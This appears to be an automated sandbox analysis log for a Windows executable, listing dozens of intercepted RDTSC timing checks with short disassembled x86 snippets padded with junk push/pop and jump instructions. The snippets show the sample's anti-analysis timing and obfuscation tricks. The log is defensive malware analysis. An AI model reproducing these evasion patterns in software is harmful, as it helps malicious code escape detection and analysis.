Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1194FBE second address: 1194FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F66E8B84A7Eh 0x00000010 jno 00007F66E8B84A76h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c popad 0x0000001d je 00007F66E8B84A76h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1195116 second address: 1195131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E96D98E5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1195131 second address: 1195178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A88h 0x00000009 popad 0x0000000a je 00007F66E8B84A87h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F66E8B84A7Fh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1195178 second address: 11951A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F66E96D98D8h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F66E96D98E5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11951A3 second address: 11951E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F66E8B84A83h 0x0000000c jmp 00007F66E8B84A81h 0x00000011 jmp 00007F66E8B84A88h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119C794 second address: 119C799 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119B5DA second address: 119B603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F66E8B84A86h 0x0000000b jo 00007F66E8B84A76h 0x00000011 jp 00007F66E8B84A76h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165268 second address: 116527F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E96D98DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116527F second address: 1165283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165283 second address: 116528C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 116528C second address: 11652DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F66E8B84A78h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push eax 0x00000022 cmc 0x00000023 pop edi 0x00000024 lea eax, dword ptr [ebp+1247AFC0h] 0x0000002a movsx edx, cx 0x0000002d call 00007F66E8B84A7Ah 0x00000032 mov dh, C8h 0x00000034 pop ecx 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007F66E8B84A78h 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11653D5 second address: 11653F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E96D98E7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11653F0 second address: 1165406 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jp 00007F66E8B84A78h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165A09 second address: 1165A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165A0F second address: 1165A22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F66E8B84A76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165A22 second address: 1165A53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E96D98E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jmp 00007F66E96D98DDh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165A53 second address: 1165A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165AEA second address: 1165AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165B21 second address: 1165B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F66E8B84A76h 0x0000000b jne 00007F66E8B84A76h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F66E8B84A76h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165B3E second address: 1165B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66E96D98DBh 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d mov cx, D491h 0x00000011 jmp 00007F66E96D98E6h 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165B70 second address: 1165B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165B76 second address: 1165B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F66E96D98D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165C18 second address: 1165C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1165CDF second address: 1165CF1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F66E96D98D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11664AF second address: 11664B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1166552 second address: 1166556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119B8D5 second address: 119B8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119BA67 second address: 119BA84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F66E96D98D6h 0x00000009 jmp 00007F66E96D98DCh 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119BA84 second address: 119BA88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119BBCC second address: 119BBF2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F66E96D98E8h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119BBF2 second address: 119BC09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119BC09 second address: 119BC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119BC0D second address: 119BC37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F66E8B84A82h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119C18D second address: 119C1A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E96D98E3h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119C317 second address: 119C31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 119C31B second address: 119C31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 111D7EA second address: 111D7F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F66E8B84A76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A277A second address: 11A279C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66E96D98E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A279C second address: 11A27A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A2A61 second address: 11A2A7D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F66E96D98E2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A2A7D second address: 11A2A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A2A84 second address: 11A2AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F66E96D98DDh 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F66E96D98D6h 0x0000001b jmp 00007F66E96D98DAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A2C1B second address: 11A2C6A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F66E8B84A76h 0x00000009 js 00007F66E8B84A76h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 jnl 00007F66E8B84A7Eh 0x00000019 pushad 0x0000001a jmp 00007F66E8B84A88h 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F66E8B84A81h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A7C71 second address: 11A7CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F66E96D98E5h 0x0000000a push eax 0x0000000b jp 00007F66E96D98D6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop eax 0x00000014 jng 00007F66E96D98EBh 0x0000001a jmp 00007F66E96D98DFh 0x0000001f ja 00007F66E96D98D6h 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F66E96D98E2h 0x0000002d pushad 0x0000002e jmp 00007F66E96D98DCh 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 jmp 00007F66E96D98DAh 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A82BB second address: 11A82CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A79DB second address: 11A79DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11A79DF second address: 11A79F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F66E8B84A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F66E8B84A7Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11ACB51 second address: 11ACB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F66E96D98D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11ACB5B second address: 11ACB5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11ACB5F second address: 11ACB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11AF6E9 second address: 11AF6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11AF6ED second address: 11AF6F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11AF6F7 second address: 11AF6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11187B5 second address: 11187C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66E96D98D6h 0x00000008 js 00007F66E96D98D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11187C5 second address: 11187D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 je 00007F66E8B84A7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11B1DC1 second address: 11B1DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11B1DC5 second address: 11B1DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11B60A1 second address: 11B6111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F66E96D98E1h 0x0000000c jmp 00007F66E96D98E0h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F66E96D98DFh 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f jmp 00007F66E96D98E8h 0x00000024 jg 00007F66E96D98E0h 0x0000002a push eax 0x0000002b push edx 0x0000002c jnl 00007F66E96D98D6h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11B5783 second address: 11B5789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11B5789 second address: 11B57A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66E96D98E9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11B5A6C second address: 11B5A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11B5A78 second address: 11B5A92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E96D98E5h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBDD7 second address: 11BBDE1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E8B84A76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBDE1 second address: 11BBDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBDE7 second address: 11BBDFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A80h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBDFC second address: 11BBE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBE09 second address: 11BBE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBE1B second address: 11BBE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F66E96D98E9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BA7FB second address: 11BA801 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BA801 second address: 11BA80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BA80D second address: 11BA811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BABA3 second address: 11BABA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BABA7 second address: 11BABAD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BABAD second address: 11BABB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BAEAE second address: 11BAEB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BAEB6 second address: 11BAEF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66E96D98DCh 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F66E96D98E0h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F66E96D98E5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBA86 second address: 11BBA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBA8B second address: 11BBA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E96D98DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBA9E second address: 11BBABB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E8B84A76h 0x00000008 jmp 00007F66E8B84A7Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BBABB second address: 11BBAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F66E96D98D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11BD43B second address: 11BD441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C2256 second address: 11C226A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E96D98E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C226A second address: 11C226E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C226E second address: 11C227D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F66E96D98D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C1671 second address: 11C1675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C1976 second address: 11C197C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C197C second address: 11C1980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
